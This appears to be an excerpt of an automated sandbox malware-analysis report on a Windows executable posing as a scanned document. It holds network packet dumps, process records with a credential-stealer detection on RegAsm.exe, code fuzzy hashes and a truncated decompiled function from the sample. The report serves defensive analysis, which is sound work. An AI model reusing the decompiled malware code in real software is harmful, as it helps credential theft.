e0 f5 07 44 c4 2c f5 0a 68 37 60 3f 86 56 2b 37 b1 a3 b2 15 1b b3 29 ca 9c 95 00 6f 96 02 c8 d9 9b 6a 6b 09 04 b9 d4 52 71 39 f7 b5 5c 55 4d e5 fa ad 46 2c 85 60 b0 2c c5 60 5c 20 6f 2e 80 fc 1a 78 7c e1 50 2d 38 46 1c 1a 86 26 5c 08 14 1d 09 95 c8 97 f5 31 59 8c 7e df 4d d9 33 b0 8b 9b 25 2f 20 d3 ad ee fd 74 b6 de 6d 6b c3 b6 7a e1
          Data Ascii: Cwe(6`$J^C/2+m|cWJ"[<o{4'j"NuUDFaQwt+<q~<^Ne&k<oZbnF#06a!b9)T$2'~^pL2Q_t2o%V8.dj%,PWZ^K"E=RoR-B&\X|F4=7o@1.!VrZqf1bF[\vz&N{%>^lu$|;-#8}3p0mSym3Zjb1B*<oN:vI;DCF~"8{CYd@C$q[E-&6Jq/IAZ`|:V)]\1>( ]hajY6+3pR;Q1Q%{i?oK3(2L2}olj9(|b?bF'R=<}0;>z=+~gO$7U[z .{!-nS'j7``oXVRpX,\GSVI#bpOao-H6c,2@N/0%E2l{%B0[!zw53#l3?>#VDoFKBGt/-z~)\Y!u92Yc[Sd?}{g%BOIFXRz>[]_%=D,h7`?V+7)ojkRq9\UMF,`,`\ o.x|P-8F&\1Y~M3%/ tmkz
          Feb 22, 2021 15:18:23.871278048 CET1121INData Raw: 2b 21 56 60 72 c2 db a1 dd 5b 75 01 fd de b5 f3 d7 61 d1 15 5b a5 4a c8 6e c9 76 e9 68 d8 0c bd 4c 63 93 9a f1 a0 db 3f af a7 49 af 6c ea 92 f5 7e 30 83 52 26 ba 9f cc 3f 2e 2d f4 29 3c 2b c7 ce 7d b8 33 e5 70 c2 30 d9 03 dc e3 46 26 08 8e 4a e6
          Data Ascii: +!V`r[ua[JnvhLc?Il~0R&?.-)<+}3p0F&J-yf$$vmZ;G*'vE,e,DDG{8r4SYd[;;}U^e6{p%IAC+8]w
          Feb 22, 2021 15:18:23.871300936 CET1123INData Raw: 97 47 7d d8 81 12 e5 01 c6 8f 71 be cd 36 27 68 e7 cf bf 15 2b a2 41 cd 55 94 6c c3 00 cc 4c a2 f3 63 51 71 86 ea c2 da 9d 5c 0c f5 f0 36 86 66 f1 ed 7a d2 88 d7 d8 36 94 bc e6 62 b7 39 f6 a4 e3 2d 67 e5 83 2c 83 cc 74 15 13 1f 4c a7 3f 1d d7 51
          Data Ascii: G}q6'h+AUlLcQq\6fz6b9-g,tL?Q<d5g#o^]6,LARZy1W\\_p?u'@th~S)n6pET^zvL/K(aCVGR-jGd&\*$"XvH'^#&7o
          Feb 22, 2021 15:18:23.871324062 CET1124INData Raw: 63 e1 c4 47 82 4d 8d 07 1b bf 95 28 34 9a d2 a0 cd 1a ec 13 4c cd 18 ea a1 7d 6e fe 6c db 68 c0 da 39 ee 89 c1 22 7c 88 b7 90 14 ab d0 df b3 f9 3f 16 a2 85 c2 1d b6 60 fc 47 8a ab 95 ac f2 0c 7a 9d 88 dc f9 17 3e 8e f6 eb 8f 16 74 2c 94 f3 30 6b
          Data Ascii: cGM(4L}nlh9"|?`Gz>t,0k79<!+g:K?([\&A4!6w#$c3&~\&WQ@X'PEYK5i}XFJ7Xb3d20<`T2{b 30Q
          Feb 22, 2021 15:18:23.917999983 CET1125INData Raw: 1a 23 70 3d b9 05 ce 17 31 21 e6 21 68 2e f7 cc 79 d3 49 e5 70 c1 92 d0 08 e2 b1 6f 1d 0e 2b 5a 30 74 01 ed f3 fa 56 f2 c0 8b 65 01 ef 98 33 da a9 72 a3 fa 92 16 b4 22 99 b5 a7 31 18 0f 71 72 1d 42 a5 fd 6f 4a 27 c6 38 76 dd 61 a0 39 d3 42 2c 78
          Data Ascii: #p=1!!h.yIpo+Z0tVe3r"1qrBoJ'8va9B,xF\8H:A[bo%|?7^g^+,'{*/EiPV)r\gK>(!H]1aY6+p;S[P
          Feb 22, 2021 15:18:23.918077946 CET1127INData Raw: c5 04 a1 a0 dd 7a 2d 9b a0 da fa b3 1f f0 06 f4 5b 66 9e 83 26 e6 ce 13 17 19 1f 73 e0 14 1d d1 5c d3 3a 3c d0 0c 4c 5d 93 6e 9b 51 d0 e5 67 93 0d e9 42 a8 58 db 6a 05 cd 04 0b 0b c1 52 74 8b 4b 9c 85 6c ed 11 3b 54 16 29 1a 3a 4d d4 35 a3 fa 5f
          Data Ascii: z-[f&s\:<L]nQgBXjRtKl;T):M5_t=>&w7j$G=>od3z/F_\0"MTGR-@4r&Z1~"^FJu4wo@!VhrvNa4,\Oa"%L{%8^
          Feb 22, 2021 15:18:23.918142080 CET1128INData Raw: 1c a2 84 ea 86 b6 60 f6 6f 55 04 95 b8 c0 97 7a 9c 99 fb d4 37 29 8f f0 c3 01 16 74 37 89 d1 f5 34 37 d3 b9 9f 14 39 df d1 12 7a 37 ee b0 09 65 b5 8b 6d e9 14 93 24 be 15 9f 76 a9 97 15 c7 a9 50 cf 65 96 5a 7e bb 05 2e 70 09 32 3c b0 d2 6f 84 63
          Data Ascii: `oUz7)t7479z7em$vPeZ~.p2<ocJhh75|ITUVb=dnIW#k8}FGE#5, i2$x-mlq'n09@/P2({'D!"NUJFzauk+
          Feb 22, 2021 15:18:23.918204069 CET1130INData Raw: 5a 8a f1 8a e2 6b 6e ee c8 12 31 1c 1c 49 33 09 37 b2 ec 64 52 f1 82 16 4c dc 5d df bf d1 44 45 17 7f 41 d5 f1 51 e7 ae 4b ff c0 31 8d 53 36 b8 49 08 97 5e ea 6c b8 1d 1c a8 0d 80 cb 08 91 d3 d5 09 11 09 ab b9 dc df 12 2e a6 14 fe f8 3b 71 1e 76
          Data Ascii: Zkn1I37dRL]DEAQK1S6I^l.;qvAr6<XJy[:V-].3'\"<]h{yR6:]`kA0S7ZR{CZ37"n16Wo\j9"(m
          Feb 22, 2021 15:18:23.918262005 CET1131INData Raw: c7 53 a0 76 23 42 3c cb 6b c7 10 4c 4d aa 84 6f a7 b7 7d e8 0d 00 20 3c 11 1c 98 56 0f 22 cc e5 77 b5 d4 32 c0 50 25 dd 16 4e 1a 29 f8 30 5f 37 6a 1f 95 44 10 3f b3 a3 90 cb 1b a2 27 e2 56 84 16 62 c9 17 c8 de 97 fb ac 25 06 ab 01 5d 53 07 3e b4
          Data Ascii: Sv#B<kLMo} <V"w2P%N)0_7jD?'Vb%]S>p]I^cp"G;:Re]<q5H1:"p`|@u"Gx.0^Jf1VQJ}v&f>In|-+>{p7mK07yjm
          Feb 22, 2021 15:18:23.918320894 CET1132INData Raw: 81 4f 99 3e b3 22 96 6f b7 ed a3 bf 31 d8 a3 da 4d e8 96 5b 56 08 32 2e 7a 2b ba 2f b7 f0 7d 97 53 13 4e 66 bb 05 68 e6 13 d8 f4 e5 4b 8b dd 35 9c 43 9f a8 78 16 89 d5 a5 57 a7 33 86 0e 73 12 d7 5c db e2 58 d1 2c 41 58 fd 45 57 92 13 4b db ab 0b
          Data Ascii: O>"o1M[V2.z+/}SNfhK5CxW3s\X,AXEWKoRnXOm;$@w*gy2Bz'CD:n6m@Ve*<"' 7`}Fg@r\6.x69N7M4(<,dtm{
          Feb 22, 2021 15:18:23.918366909 CET1134INData Raw: aa 80 71 85 64 a9 1f 67 5c 1a 0d ee 19 98 c3 c1 73 e1 00 bd a4 53 c8 0a 3f e1 51 fe f8 3b 55 2b 3d 87 83 ae 8c 27 9f 8c 1b d6 e8 82 f8 55 30 36 1f 1e ad 0b f4 d0 cd c7 e4 07 2f 98 e2 35 41 c6 f5 e8 b9 20 dc e0 08 e6 a0 39 3a bd fd f6 ad c0 b3 ad
          Data Ascii: qdg\sS?Q;U+='U06/5A 9:8u+^g%!)!(*LWlH`|7.`pX?Q](hbAoIw3RfF{1l`F9`xIU>CG-z#hb=Q7;u5


          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:15:17:58
          Start date:22/02/2021
          Path:C:\Users\user\Desktop\SKM_C3350191107102300.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Imagebase:0x400000
          File size:61440 bytes
          MD5 hash:58BB0368BC9CF6EC86C266F54CDEFEEB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Visual Basic
          Reputation:low

          General

          Start time:15:18:09
          Start date:22/02/2021
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Imagebase:0xe60000
          File size:64616 bytes
          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp, Author: Joe Security
          Reputation:high

          General

          Start time:15:18:09
          Start date:22/02/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff61de10000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Disassembly

          Code Analysis

          Reset < >

            Executed Functions

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID:
            • String ID: h
            • API String ID: 0-2439710439
            • Opcode ID: 93c0e0051c5242e55b5449983aaf876c88264de2d17a2664e0fd32a427c8c364
            • Instruction ID: 02e6783a29a4a1764f3bbe39322031e31bad3bd57f1c892bd82859c99bc44b20
            • Opcode Fuzzy Hash: 93c0e0051c5242e55b5449983aaf876c88264de2d17a2664e0fd32a427c8c364
            • Instruction Fuzzy Hash: 4F71167254D3C29ED71A9E20D8C07E47F67BF1B649F0D419AD892AB1C2E39646D8C382
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0902c92eabadf07cd88e65b010304c6c78f3569ac19430388333999a6aa9d696
            • Instruction ID: 964af1a1dcc7d2c437adfa1a4a0608b17933c507d889d48571876226611352d4
            • Opcode Fuzzy Hash: 0902c92eabadf07cd88e65b010304c6c78f3569ac19430388333999a6aa9d696
            • Instruction Fuzzy Hash: B5618A7258C3C5DEDB1D5F2088D03E43B6AFF56344F4A42AAC8639B0D1D3A685E4C781
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6f1a559bf6fdef735414c66f05483f95dda75da85a8ea3e187603e494cdb4059
            • Instruction ID: 0031a8c78453486b584f9e4750e6c5c94e596f5083fa4d22fcc2868dcca0ef84
            • Opcode Fuzzy Hash: 6f1a559bf6fdef735414c66f05483f95dda75da85a8ea3e187603e494cdb4059
            • Instruction Fuzzy Hash: 49516B7168C3C5CEDB1D5E20C9D43E43B6AFF12354F4A42AAC9A39B0D1D3A685E4C781
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: df43cb6f291f3dc2a46ab9ef4bf06859a457485845c65e2e3b10942eafcae6c9
            • Instruction ID: 0901a872fcf7a5568fce6a9389e12fcdadeb2edf575573ce6992756405268ba9
            • Opcode Fuzzy Hash: df43cb6f291f3dc2a46ab9ef4bf06859a457485845c65e2e3b10942eafcae6c9
            • Instruction Fuzzy Hash: 5D51C47294D3C29ED71A8E2099D07E47F277F1B659F0D01DAC892AB1C2E35A46D8C782
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 57c07c8c18be5081c9d4af9850e07dd05b08e7b257a9cff4becb1a2792597866
            • Instruction ID: 181e72797786f3ea7106aa358b9ff86b46c06f060e1de3d61df6b1e7c55b3b83
            • Opcode Fuzzy Hash: 57c07c8c18be5081c9d4af9850e07dd05b08e7b257a9cff4becb1a2792597866
            • Instruction Fuzzy Hash: 525146716883C1CEEB2D5E20C9D43E43B6AAF12354F4A41ABC9639B0C1D3A685E4C742
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7d0ee3d2c3b45557f4fd7d3146e00ff4d88e40bbab4ac0507bc405b14305748c
            • Instruction ID: 8ef70cd2b44d98c63eef2898d1d7cb7c86f31ac7405cbec1021495882ca8450d
            • Opcode Fuzzy Hash: 7d0ee3d2c3b45557f4fd7d3146e00ff4d88e40bbab4ac0507bc405b14305748c
            • Instruction Fuzzy Hash: 3B3116307882C5CEEB2C6D15CAD43B5325AAF513A4F56962ADD63870D0E3F688E4C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: bbc83fa35985e94667aead630b6405afc8823e9c7deeef3aea0fe9b8ccc3a391
            • Instruction ID: c0dc6e6ad867ecdd4dd7a510d5c896e204445b32a68ba71f32133918f16b4f3e
            • Opcode Fuzzy Hash: bbc83fa35985e94667aead630b6405afc8823e9c7deeef3aea0fe9b8ccc3a391
            • Instruction Fuzzy Hash: C331F430688285CEEF2C6A15CAD43B8325AAF513A4F56466ADD63870D0D3F688E4CB52
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 7d2f7fc577a9afd493eb851cc57215a1791f7aaa5fef8e6eeee54bb27b7893ac
            • Instruction ID: 4ee048e41e41452b7290dbea8864ca4e3703a52d8f7824b4b133e4e4e409a782
            • Opcode Fuzzy Hash: 7d2f7fc577a9afd493eb851cc57215a1791f7aaa5fef8e6eeee54bb27b7893ac
            • Instruction Fuzzy Hash: 5231E8307882C5CEEB2C6A15CAD43B8325AAF513A4F56466ADD63870D0D3F688E4C752
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 81cca80d95e2b56e091f8b932a2df094a6d62618ee01e04399ae1577919e4367
            • Instruction ID: 0edeedb2d4340f192ab314a348059a09d2576797c52fe2989d0444d12e320696
            • Opcode Fuzzy Hash: 81cca80d95e2b56e091f8b932a2df094a6d62618ee01e04399ae1577919e4367
            • Instruction Fuzzy Hash: 303128303886C5CEFB2C5A15CAD43B4325AAF413A4F56426ADD63870D0D3F684E4C752
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 2180adc72be92a3315a481a96c37f1279c9d79fec0423352e6b694a8450d255b
            • Instruction ID: 0bb058f4eb99ab3d968e64e578e7365891f295b3ec8de0b4189d396978dc35d7
            • Opcode Fuzzy Hash: 2180adc72be92a3315a481a96c37f1279c9d79fec0423352e6b694a8450d255b
            • Instruction Fuzzy Hash: E631F6303882C5CEFB2C6A15CAD43B9325AAF413A4F56826ADD63870D0D3F688E4C752
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: b4c86f53540d087c501ea9faedd641819bc26542b1c9fb4c2c76a1b9194e97c9
            • Instruction ID: b27074af5976548f7713b8f45f6f58119a4e455d1f7609d9938179f75e8044eb
            • Opcode Fuzzy Hash: b4c86f53540d087c501ea9faedd641819bc26542b1c9fb4c2c76a1b9194e97c9
            • Instruction Fuzzy Hash: 3431E430388685CEFB3C5A15CAD43B9365AAF513A4F5A426AED67870D0D3F688E4C742
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: db806565088ac2149440e607c60b976b6becc0c03953859b517dfab801d34dfb
            • Instruction ID: 040a0596946ef43ebce3a551441df2dbd776fd8f63d8cee5443ef955e39f80ac
            • Opcode Fuzzy Hash: db806565088ac2149440e607c60b976b6becc0c03953859b517dfab801d34dfb
            • Instruction Fuzzy Hash: 0221E730388685CEFB2C5A15CAD43B9365AEF51364F56426AED67870D0D3F784E4C742
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: f530a06f6d7c162ea573bcc71a2e2de97b0944db1278783d768837c8e0a244ed
            • Instruction ID: 04346c992cb49982763bcad1d4dc5f33af46d9cf46715ee55a1aae7d8748dbab
            • Opcode Fuzzy Hash: f530a06f6d7c162ea573bcc71a2e2de97b0944db1278783d768837c8e0a244ed
            • Instruction Fuzzy Hash: FC21F730388689CEFB2C5A15CAD43B5365AEF51364F96426AEDA7870D0D3F788E4C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: a2e4fc16fa61f56d1ca68129ff2203251a8a1ed6a56d1996fda2988b00db8733
            • Instruction ID: ad31abe696f1362fe5fb0b9c0f2ec865bdb63017d6bdf4c46c2990fab7ae6351
            • Opcode Fuzzy Hash: a2e4fc16fa61f56d1ca68129ff2203251a8a1ed6a56d1996fda2988b00db8733
            • Instruction Fuzzy Hash: F621F730388689CEFB2C5A15CAD43B5365AEF51364F55426AEDA6870D0D3F788E4C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5b7a80330329f388b0e6dc13fdffcb88145448053f094bf1053c3a0d63361bb1
            • Instruction ID: 4d4cd429b0ad0c4bd12e132900c89115cb6235a78147f8a4a53df5f1f9401730
            • Opcode Fuzzy Hash: 5b7a80330329f388b0e6dc13fdffcb88145448053f094bf1053c3a0d63361bb1
            • Instruction Fuzzy Hash: 17210A30388789CEFB384A21CAD43B4365AEF513A4F95426ADDA6870D4D3F784E4C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 4788c7cbcd8ae262bb3251e595b2982a3db5f09772e0b22c8b8c78f18f6cae04
            • Instruction ID: 1ab62cadec0d7ced49a7627b637324250cc4157253c51984d2760169175769ed
            • Opcode Fuzzy Hash: 4788c7cbcd8ae262bb3251e595b2982a3db5f09772e0b22c8b8c78f18f6cae04
            • Instruction Fuzzy Hash: B7210830388789CDFB384A11C6D43B4325AEF513A4F95426ADDA6870E4D3F784E4C742
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 35e0a0985c711d0c696816a2c18c10d664e27804eac26212dff859e95512f4a4
            • Instruction ID: eeec310255336fdd268ad9f5c0b4c944c1ca8c11d1260973f6cb6e1458d3c1b6
            • Opcode Fuzzy Hash: 35e0a0985c711d0c696816a2c18c10d664e27804eac26212dff859e95512f4a4
            • Instruction Fuzzy Hash: C921E730788789CDFB394A21CAD47B4365AEF513A4F95426AECA6870E4D3F784E4C742
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: c4a0f85252cce9a1c4792e20ca61888b860622afe71bbfb40b75cf81346f52dd
            • Instruction ID: 53f166f379c5a5a99099d29dfb263434879a97c676befd754acac24c93a433b4
            • Opcode Fuzzy Hash: c4a0f85252cce9a1c4792e20ca61888b860622afe71bbfb40b75cf81346f52dd
            • Instruction Fuzzy Hash: 7D21E930788389CDFB384A11CAD83A4325AEF413A5F95566BEDA2870D4D3F384E4C782
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 875e8c8da3fb8bb62e419a3dd3043f1f86d4c7d0df2950aacd019f5f2134ea9e
            • Instruction ID: 8e895a6ae729a179516821a49865e373979ab25c07c53395916d878d13904d5f
            • Opcode Fuzzy Hash: 875e8c8da3fb8bb62e419a3dd3043f1f86d4c7d0df2950aacd019f5f2134ea9e
            • Instruction Fuzzy Hash: 2C112E30688349CEFB284B15C6C83643259EF413B5F954266EC52870D4D3B388E4C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 787b31842b406c896a53bfea7cfb0ae378ba06a96fe9dd3863f3128c862f3358
            • Instruction ID: 51cdb0c8c2ab6bd477747be7c07dad7202158c1ca5fd6a1d42fa0dbea1c05378
            • Opcode Fuzzy Hash: 787b31842b406c896a53bfea7cfb0ae378ba06a96fe9dd3863f3128c862f3358
            • Instruction Fuzzy Hash: E3110D30788749CDFB284E25CAC83A47259EF41375F99566AECA6870E4D3B384E4C781
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 18d0de89fa25eddb2b357e13734bd343f735cdd96496677fe00a5980f89e15f1
            • Instruction ID: eaf64c159aaaad87be34cba04cff8cfdcc3e0314a1240239ead2fa5043106a11
            • Opcode Fuzzy Hash: 18d0de89fa25eddb2b357e13734bd343f735cdd96496677fe00a5980f89e15f1
            • Instruction Fuzzy Hash: 28110C30688389CDFB285A12C6C83643259EF513A5F99526AEC91870E4C3F388D4C781
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 29134a0f89cfcf0db9c51179cf2711b4c97ba47ce5c110b4f8d8663b194c3d83
            • Instruction ID: d09f7524785c5f8ef1371e8225fdcfa37e541f4f2d4923983f49e8b4954acbd5
            • Opcode Fuzzy Hash: 29134a0f89cfcf0db9c51179cf2711b4c97ba47ce5c110b4f8d8663b194c3d83
            • Instruction Fuzzy Hash: 61112830688389CDFF288B21C6C83A873A5AF81365F89426BDC81870E1C3F388D4C781
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.387355461.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 10f0035db082803e3f18f2b37773143a1e7c04fcd1aa01c06474e36a467edeed
            • Instruction ID: 4b975ca3392ccc31f6d3d86eaab93ffb6a2e8f3ef1dc80fdfcb2a42ed904bd66
            • Opcode Fuzzy Hash: 10f0035db082803e3f18f2b37773143a1e7c04fcd1aa01c06474e36a467edeed
            • Instruction Fuzzy Hash: 1BE09A30388247CDAB2DAA20C2C46A83227EF90744BE84066EA8246868D33308DACB41
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 60%
            			E0040A804(void* __ebx, void* __edi, void* __esi, signed int _a4) {
            				signed int _v8;
            				intOrPtr _v12;
            				char** _v16;
            				intOrPtr _v28;
            				signed int _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				char _v44;
            				signed int _v48;
            				signed int _v52;
            				char _v56;
            				signed int* _v60;
            				signed int _v64;
            				void* _v76;
            				long long _v84;
            				char* _v88;
            				signed int _v92;
            				char _v96;
            				signed int _v100;
            				char _v104;
            				intOrPtr _v112;
            				char _v120;
            				char _v136;
            				char _v156;
            				char* _v164;
            				char _v172;
            				intOrPtr _v180;
            				char _v188;
            				char _v192;
            				void* _v196;
            				char* _v200;
            				char _v204;
            				char _v208;
            				char _v212;
            				char _v216;
            				char _v220;
            				intOrPtr _v224;
            				char _v228;
            				intOrPtr _v232;
            				char _v236;
            				signed int _v240;
            				signed int _v244;
            				signed int _v248;
            				signed int _v252;
            				intOrPtr* _v256;
            				signed int _v260;
            				signed int _v264;
            				intOrPtr _v268;
            				intOrPtr _v272;
            				signed int _v284;
            				signed int _v288;
            				signed int _v292;
            				void* _v296;
            				intOrPtr* _v300;
            				signed int _v304;
            				signed int* _v308;
            				signed int _v312;
            				intOrPtr* _v316;
            				signed int _v320;
            				intOrPtr* _v324;
            				signed int _v328;
            				intOrPtr* _v332;
            				signed int _v336;
            				intOrPtr* _v340;
            				signed int _v344;
            				signed int _v348;
            				intOrPtr* _v352;
            				signed int _v356;
            				intOrPtr* _v360;
            				signed int _v364;
            				intOrPtr* _v368;
            				signed int _v372;
            				signed int _v376;
            				intOrPtr* _v380;
            				signed int _v384;
            				intOrPtr* _v388;
            				signed int _v392;
            				intOrPtr* _v396;
            				signed int _v400;
            				signed int _v404;
            				intOrPtr* _v408;
            				signed int _v412;
            				signed int _v416;
            				signed int _v420;
            				void* _v440;
            				intOrPtr _v456;
            				char** _v460;
            				void* _v472;
            				signed int _t485;
            				signed int _t492;
            				signed int _t496;
            				signed int _t508;
            				signed int _t512;
            				signed int _t516;
            				signed int _t520;
            				signed int _t533;
            				signed int _t537;
            				signed int _t549;
            				signed int _t554;
            				signed int _t558;
            				signed int _t562;
            				signed int _t566;
            				signed int _t578;
            				signed int _t582;
            				signed int _t590;
            				char* _t593;
            				signed int _t597;
            				signed int _t601;
            				signed int _t605;
            				signed int _t609;
            				char* _t613;
            				signed int _t617;
            				signed int _t627;
            				signed int _t634;
            				signed int _t638;
            				signed int _t643;
            				signed int _t649;
            				signed int _t653;
            				signed int _t655;
            				signed int _t657;
            				char* _t658;
            				signed int _t664;
            				signed int _t668;
            				signed int _t678;
            				void* _t685;
            				intOrPtr _t697;
            				intOrPtr _t713;
            				intOrPtr _t726;
            				intOrPtr _t730;
            				char* _t731;
            				char** _t745;
            				char* _t750;
            				void* _t753;
            				void* _t754;
            				void* _t756;
            				char** _t757;
            				char** _t758;
            				char** _t759;
            				char** _t760;
            
            				_t685 = __ebx;
            				_t754 = _t756;
            				_t757 = _t756 - 0xc;
            				 *[fs:0x0] = _t757;
            				L00401190();
            				_v16 = _t757;
            				_v12 = 0x4010f8;
            				_v8 = _a4 & 0x00000001;
            				_a4 = _a4 & 0xfffffffe;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401196, _t753);
            				_v164 = L"19:19:19";
            				_v172 = 8;
            				L00401298();
            				_push( &_v120);
            				_push( &_v136); // executed
            				L0040129E(); // executed
            				_v180 = 0x13;
            				_v188 = 0x8002;
            				_push( &_v136);
            				_t485 =  &_v188;
            				_push(_t485);
            				L004012A4();
            				_v240 = _t485;
            				_push( &_v136);
            				_push( &_v120);
            				_push(2);
            				L00401292();
            				_t758 =  &(_t757[3]);
            				if(_v240 != 0) {
            					if( *0x40d010 != 0) {
            						_v300 = 0x40d010;
            					} else {
            						_push(0x40d010);
